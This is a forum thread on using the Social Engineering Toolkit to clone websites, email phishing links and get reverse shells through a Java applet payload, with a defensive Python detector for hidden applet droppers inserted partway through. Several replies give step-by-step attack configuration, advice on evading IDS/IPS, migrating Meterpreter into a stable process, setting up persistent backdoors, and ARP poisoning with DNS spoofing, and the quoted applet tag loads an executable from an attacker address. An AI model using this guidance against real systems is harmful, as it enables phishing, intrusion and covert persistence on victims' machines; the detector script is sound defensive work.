
Thread: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

  1. #31
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    6

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by pureh@te
    A. You have permission from the ISP (They tend to frown on public exploitation)
    If this were to be done between two consenting parties via WAN, but the ISP, IPS and/or IDS detect the signatures of flying shells and terminate them automatically by policy, then it would be sensible to encrypt or tunnel the connection. Can Metasploit perform such a task?

    Sorry if this sounds a little "noobish"; I'm familiar with Metasploit but only as far as the basics go.

  2. #32
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by fddi_sent
    Semi-inside joke; I did in fact mean sacmaniac.com ;-)

  3. #33
    Just burned his ISO HAL9000's Avatar
    Join Date
    Mar 2010
    Posts
    11

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    OK Folks!!!

    I used this method with my PC and I have modified the router to forward the port in order to use my local IP address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is: how can we keep the connection alive when we are inside the remote PC?
    I mean, in order to avoid having to social-engineer the target into making a connection with IE or Firefox every time, is it possible to upload software to the remote PC that can start the connection with mine whenever I like?

    Thanks

  4. #34
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    6

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by HAL9000
    So now the question is: how can we keep the connection alive when we are inside the remote PC?
    I mean, in order to avoid having to social-engineer the target into making a connection with IE or Firefox every time, is it possible to upload software to the remote PC that can start the connection with mine whenever I like?

    Thanks
    There are literally countless ways to preserve a connection after obtaining a shell. Check out chapter 11 in the Metasploit Unleashed guide:
    Metasploit Unleashed - Mastering the Framework

  5. #35
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default

    Quote Originally Posted by seanile
    Hi,
    I have had this working and gained full access to my XP SP2 box just great.
    Tried to do it again many times - won't work. This is what I am doing:
    ./set
    select - 2 website vectors
    select - 2 clone and setup fake website
    select - 1 Java applet attack method
    enter url www.etcetc.co
    returns Payload name 98iywQNlF.exe (this time - different each try)
    select - 1 Windows Shell reverse TCP
    select - 2 shikata_ga_nai
    2 times
    enter port 55555
    linux/OSX = no
    select - 1 single Email address
    select - 1 Gmail
    now it sends email and MSF fires up
    started reverse handler on 192.168.1.3:55555 etc
    Now on XP box Firefox browser
    email to my hotmail account received OK
    enter http://192.168.1.3:55555
    back in MSF = command shell session 1 opened (192.168.1.3:55555 -> 192.168.1.10:3547)
    meantime XP browser waiting for 192.168.1.3
    msf enter sessions -i 1 shows several lines and hangs in cookie list
    have to abort the session.

    in the BT4 /site/template directory the file index.html is the cloned website, and also the 98iywQNlF.exe file
    any ideas please as it has worked the once only
    many thanks
    Heya there guy, your problem is you're going to:

    http://ip:55555

    It will initiate the payload second stage downloader because you're initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to set up the fake website, so you would browse to http://ip instead, not http://ip:55555. If you need the SET web server to be on a different port, edit config/set_config and change WEB_PORT=80 to something different.

    I hope that helps!

    ReL

    Quote Originally Posted by theyhadsaid
    REL1K: where can I find the source code of Java.class? I am not good at Java, so decompiling is not useful to me. I just want to change the name of the Java Applet, but I can't because SET comes with a pre-compiled class. Thanks.
    I can work with you on changing that; send me a PM on IRC (rel1k).

    Quote Originally Posted by Utram
    Good post, what an excellent time-saving app.

    I'm considering implementing the email aspect of this program into a pentest. But it doesn't bind when I type in my public IP, or will it automatically do that? This will be done through WAN, so I'm going with the assumption that typing in only my local IP address will be insufficient.
    Utram, by default SET binds to whatever interface is used to connect to the outbound internet (specifically Google). If that is different from your externally facing interface, you can turn auto detect off through config/set_config: there is an AUTO_DETECT=ON flag that you change to AUTO_DETECT=OFF. Once that occurs, you can manually set your listening IP address through that!

    Hope that helps.

    ReL

    Quote Originally Posted by Utram
    If this were to be done between two consenting parties via WAN, but the ISP, IPS and/or IDS detect the signatures of flying shells and terminate them automatically by policy, then it would be sensible to encrypt or tunnel the connection. Can Metasploit perform such a task?

    Sorry if this sounds a little "noobish"; I'm familiar with Metasploit but only as far as the basics go.
    The payloads themselves are obfuscated through encoding, so IDS/IPS shouldn't pick them up; however, if it's a HIPS-based solution, anything new that hasn't executed a socket connection back may be suspicious. I would recommend utilizing Meterpreter, as the communications back and forth are done via SSL.

    Quote Originally Posted by HAL9000
    OK Folks!!!

    I used this method with my PC and I have modified the router to forward the port in order to use my local IP address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is: how can we keep the connection alive when we are inside the remote PC?
    I mean, in order to avoid having to social-engineer the target into making a connection with IE or Firefox every time, is it possible to upload software to the remote PC that can start the connection with mine whenever I like?

    Thanks
    What ends up happening (if I understand you right) is that once the command shell or reverse Meterpreter or whatever is initiated, it's running under the same memory space and process as IEXPLORER.EXE; if the victim closes his or her browser, the thread is terminated and hence the connection closes. I would recommend utilizing Meterpreter in this instance because, as soon as you get that connection, you can type "ps", look for something like explorer.exe or another stable Windows process, and type "migrate <process id>". This will allow you to migrate off of the iexplorer memory address space, and if the victim closes it, the connection will still remain open.

    You can also use a persistent Meterpreter instance, where Meterpreter will connect back at specific intervals if the connection is lost. Check out Metasploit Unleashed - Mastering the Framework; it has some info on getting a persistent Meterpreter console. I also believe a Ruby script was created to help with this now.

    Hope that helps!

    ReL
    Last edited by Archangel-Amael; 03-09-2010 at 11:36 PM.

  6. #36
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Does it not work in Windows XP SP3? I tried it on my own computer and cannot collect, and I don't have a session...
    What's wrong with me?

    Quote Originally Posted by relik
    Heya there guy, your problem is you're going to:

    http://ip:55555

    It will initiate the payload second stage downloader because you're initiating a valid connection to the server. The port 55555 is only for the payload to return back to you. SET by default uses port 80 to set up the fake website, so you would browse to http://ip instead, not http://ip:55555. If you need the SET web server to be on a different port, edit config/set_config and change WEB_PORT=80 to something different.

    I hope that helps!

    ReL

  7. #37
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    7

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Hi all,

    First off, thanks for this great tutorial pureh@te. I have followed this and have managed to create a cloned site and send an e-mail to my victim laptop (XP SP3); I click the link and the Java applet is loaded. I want to try and take this a step further. I have now opened up ettercap, selected both my victim machine and my router, and then ran ARP poisoning. I have also configured my dns.spoof (* A 10.1.1.3) to redirect everything to my cloned site. This works, but then the Java applet does not load. Any ideas on how to fix this?

    Many thanks in advance

  8. #38
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    10

    Question Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    Quote Originally Posted by HAL9000
    OK Folks!!!

    I used this method with my PC and I have modified the router to forward the port in order to use my local IP address to exploit the PCs outside my network.
    I made a test and it works fine!!!

    So now the question is: how can we keep the connection alive when we are inside the remote PC?
    I mean, in order to avoid having to social-engineer the target into making a connection with IE or Firefox every time, is it possible to upload software to the remote PC that can start the connection with mine whenever I like?

    Thanks
    How did you get this to work? I forwarded all ports (80, 4444, 8080, and 8081) to my local IP and was still unable to get this to work. The problem is that the source code in the cloned website points to a local IP: <applet width="1" height="1" code="Java.class" archive="Signed_Update.jar"><param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe"><param name="MAC" value="http://192.168.1.3/mac.bin">

    Over a WAN this obviously won't work. Is there a way this can be changed?
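    The post above quotes the applet tag that a SET-cloned page carries: a 1x1 applet whose WIN and MAC params point at executables on a private address. The following Python script is an added example, not code from this thread or from SET itself, that shows how a defender can scan a fetched HTML page for that shape (hidden applets, params that resolve to executables, params that fetch from a private address). The sample HTML is constructed for the example and mirrors the tag quoted above; the attribute names it checks are the ones visible in the quoted tag.

```python
"""Flag HTML pages that carry a hidden Java applet dropper.

Added example for this thread; the sample page below is constructed
to mirror the <applet> tag quoted in the post above.
"""
from html.parser import HTMLParser
import ipaddress
from urllib.parse import urlparse

# Constructed sample: one hidden applet of the quoted shape plus one
# ordinary, visible applet that should not be flagged.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<applet width="1" height="1" code="Java.class" archive="Signed_Update.jar">
<param name="WIN" value="http://192.168.1.3/fkKyej0bY.exe">
<param name="MAC" value="http://192.168.1.3/mac.bin">
</applet>
<applet width="300" height="200" code="Game.class" archive="game.jar"></applet>
</body></html>"""

# File extensions that an applet <param> should never be handing out.
PAYLOAD_SUFFIXES = (".exe", ".bin", ".dll", ".scr")


class AppletCollector(HTMLParser):
    """Collect every <applet> with its attributes and nested <param>s."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value", "") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def _is_hidden(attrs):
    """A 1x1 (or smaller) applet has no legitimate reason to be on the page."""
    try:
        return int(attrs.get("width", "0")) <= 1 and int(attrs.get("height", "0")) <= 1
    except ValueError:
        return False


def _private_host(url):
    """True if the URL's host is a private IP (the page was cloned on a LAN)."""
    host = urlparse(url).hostname or ""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # hostname, not an IP literal


def find_suspicious_applets(html):
    """Return one finding per applet that looks like a dropper."""
    parser = AppletCollector()
    parser.feed(html)
    findings = []
    for applet in parser.applets:
        reasons = []
        if _is_hidden(applet["attrs"]):
            reasons.append("1x1 (hidden) applet")
        for name, value in applet["params"].items():
            if value.lower().endswith(PAYLOAD_SUFFIXES):
                reasons.append(f"param {name} points at executable {value}")
            if _private_host(value):
                reasons.append(f"param {name} fetches from private address")
        if reasons:
            findings.append({"archive": applet["attrs"].get("archive"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_applets(SAMPLE_HTML):
        print(finding["archive"], "->", "; ".join(finding["reasons"]))
```

    Run against the constructed page it reports only Signed_Update.jar, with five reasons (hidden size, and both params pointing at an executable on a private address); the visible game applet is left alone. The private-address check is what distinguishes the LAN-cloned page described in the post from one prepared for a public host, so treat it as a clue about origin rather than a requirement for flagging.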

  9. #39
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

    It will work fine, you need to add your public IP when creating the fake site.

  10. #40
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    10

    Default Re

    Ok I got it. I had to go into the SET config and disable auto detect IP.

    Thanks,

